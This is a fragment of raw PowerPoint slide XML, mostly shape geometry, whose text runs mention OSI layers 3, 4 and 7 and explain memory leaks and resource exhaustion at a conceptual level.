              <a:ext cx="1445260" cy="980440"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1445259" h="980440">
                  <a:moveTo>
                    <a:pt x="1288287" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="156463" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107029" y="8329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64081" y="31520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30203" y="66879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7981" y="111711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="163321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="816610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7981" y="868220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30203" y="913052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64081" y="948411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107029" y="971602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156463" y="979932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1288287" y="979932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1337722" y="971602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1380670" y="948411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1414548" y="913052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436770" y="868220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1444752" y="816610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1444752" y="163321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436770" y="111711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1414548" y="66879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1380670" y="31520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1337722" y="8329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1288287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273290" y="6096761"/>
              <a:ext cx="1445260" cy="980440"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1445259" h="980440">
                  <a:moveTo>
                    <a:pt x="0" y="163321"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7981" y="111711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30203" y="66879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64081" y="31520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107029" y="8329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156463" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1288287" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1337722" y="8329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1380670" y="31520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1414548" y="66879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436770" y="111711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1444752" y="163321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1444752" y="816610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436770" y="868220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1414548" y="913052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1380670" y="948411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1337722" y="971602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1288287" y="979932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156463" y="979932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107029" y="971602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64081" y="948411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30203" y="913052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7981" y="868220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="816610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="16332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7823454" y="6376161"/>
            <a:ext cx="3454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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>02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710682" y="4462526"/>
            <a:ext cx="1470660" cy="1007110"/>
            <a:chOff x="5710682" y="4462526"/>
            <a:chExt cx="1470660" cy="1007110"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="object 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5723382" y="4475226"/>
              <a:ext cx="1445260" cy="981710"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1445259" h="981710">
                  <a:moveTo>
                    <a:pt x="1288288" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="156463" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107029" y="8343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64081" y="31573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30203" y="66988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7981" y="111890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="163575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="817879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7981" y="869565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30203" y="914467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64081" y="949882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107029" y="973112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156463" y="981456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1288288" y="981456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1337722" y="973112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1380670" y="949882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1414548" y="914467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436770" y="869565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1444751" y="817879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1444751" y="163575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436770" y="111890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1414548" y="66988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1380670" y="31573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1337722" y="8343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1288288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723382" y="4475226"/>
              <a:ext cx="1445260" cy="981710"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1445259" h="981710">
                  <a:moveTo>
                    <a:pt x="0" y="163575"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7981" y="111890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30203" y="66988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64081" y="31573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107029" y="8343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156463" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1288288" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1337722" y="8343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1380670" y="31573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1414548" y="66988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436770" y="111890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1444751" y="163575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1444751" y="817879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436770" y="869565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1414548" y="914467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1380670" y="949882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1337722" y="973112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1288288" y="981456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156463" y="981456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107029" y="973112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64081" y="949882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30203" y="914467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7981" y="869565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="817879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="163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6272910" y="4755642"/>
            <a:ext cx="3454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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>01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31026" y="7482967"/>
            <a:ext cx="312864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Transport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layer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(layer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4)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795507" y="4770247"/>
            <a:ext cx="33089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Application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layer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(layer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7)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82342" y="4767834"/>
            <a:ext cx="29616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Network</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-14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layer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(layer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3)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581144" y="3409188"/>
            <a:ext cx="6864350" cy="477520"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6864350" h="477520">
                <a:moveTo>
                  <a:pt x="6784594" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="79501" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48541" y="6242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23272" y="23272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6242" y="48541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="79501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="397510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6242" y="428470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23272" y="453739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48541" y="470769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79501" y="477012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6784594" y="477012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6815554" y="470769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6840823" y="453739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6857853" y="428470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6864096" y="397510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6864096" y="79501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6857853" y="48541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6840823" y="23272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6815554" y="6242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6784594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5233161" y="3453129"/>
            <a:ext cx="555942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Open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Systems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Interconnection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(OSI)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layers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41011" y="306451"/>
            <a:ext cx="717169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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Memory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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Leaks</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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5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dirty="0" spc="-4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E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Resource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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Exhaustion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27910" y="1933193"/>
            <a:ext cx="1200213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20">
                <a:solidFill>
                  <a:srgbClr val="3B4043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25">
                <a:solidFill>
                  <a:srgbClr val="3B4043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3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ideal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>situation,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043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4">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043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05">
                <a:solidFill>
                  <a:srgbClr val="3B4043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3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>block</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043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30">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="3B4043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3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-120">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>no</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-120">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>longer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>requires</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>it.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3448" y="760476"/>
            <a:ext cx="9828275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797176" y="2811779"/>
            <a:ext cx="6341110" cy="4686300"/>
            <a:chOff x="1797176" y="2811779"/>
            <a:chExt cx="6341110" cy="4686300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1806701" y="3365753"/>
              <a:ext cx="6322060" cy="4122420"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6322059" h="4122420">
                  <a:moveTo>
                    <a:pt x="0" y="93980"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7379" y="57382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27511" y="27511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57382" y="7379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93980" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6227572" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6264169" y="7379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6294040" y="27511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6314172" y="57382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6321552" y="93980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6321552" y="4028440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6314172" y="4065037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6294040" y="4094908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6264169" y="4115040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6227572" y="4122420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93980" y="4122420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57382" y="4115040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27511" y="4094908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7379" y="4065037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4028440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="93980"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="1905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601467" y="2811779"/>
              <a:ext cx="4657725" cy="1114425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4657725" h="1114425">
                  <a:moveTo>
                    <a:pt x="4471670" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="185674" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136333" y="6636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91985" y="25362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="54403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25362" y="91985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6636" y="136333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="185674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="928370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6636" y="977710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25362" y="1022058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="1059640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91985" y="1088681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136333" y="1107407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185674" y="1114044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4471670" y="1114044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4521010" y="1107407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4565358" y="1088681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4602940" y="1059640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4631981" y="1022058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4650707" y="977710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4657343" y="928370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4657343" y="185674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4650707" y="136333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4631981" y="91985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4602940" y="54403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4565358" y="25362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4521010" y="6636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4471670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3964940" y="3175254"/>
            <a:ext cx="192913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Memory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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Leaks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816720" y="2898648"/>
            <a:ext cx="6342380" cy="4599305"/>
            <a:chOff x="8816720" y="2898648"/>
            <a:chExt cx="6342380" cy="4599305"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8826245" y="3365754"/>
              <a:ext cx="6323330" cy="4122420"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6323330" h="4122420">
                  <a:moveTo>
                    <a:pt x="0" y="93980"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7379" y="57382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27511" y="27511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57382" y="7379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93979" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6229096" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6265693" y="7379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6295564" y="27511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6315696" y="57382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6323075" y="93980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6323075" y="4028440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6315696" y="4065037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6295564" y="4094908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6265693" y="4115040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6229096" y="4122420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93979" y="4122420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57382" y="4115040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27511" y="4094908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7379" y="4065037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4028440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="93980"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050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506711" y="2898648"/>
              <a:ext cx="4924425" cy="1000125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4924425" h="1000125">
                  <a:moveTo>
                    <a:pt x="4757420" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="166624" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122310" y="5948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82502" y="22737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48783" y="48783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22737" y="82502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5948" y="122310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="166624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="833119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5948" y="877433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22737" y="917241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48783" y="950960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82502" y="977006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122310" y="993795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166624" y="999743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4757420" y="999743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4801733" y="993795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4841541" y="977006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4875260" y="950960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4901306" y="917241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4918095" y="877433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4924044" y="833119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4924044" y="166624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4918095" y="122310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4901306" y="82502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4875260" y="48783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4841541" y="22737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4801733" y="5948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4757420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10596118" y="3204717"/>
            <a:ext cx="274637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Resourc</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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Exhaustion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82189" y="4324604"/>
            <a:ext cx="4859655" cy="27076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marR="12065" indent="-3429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pro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ces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alloca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memo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y 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locations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but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never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releases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them.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="103505" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264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cause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host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run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out</a:t>
            </a:r>
            <a:r>
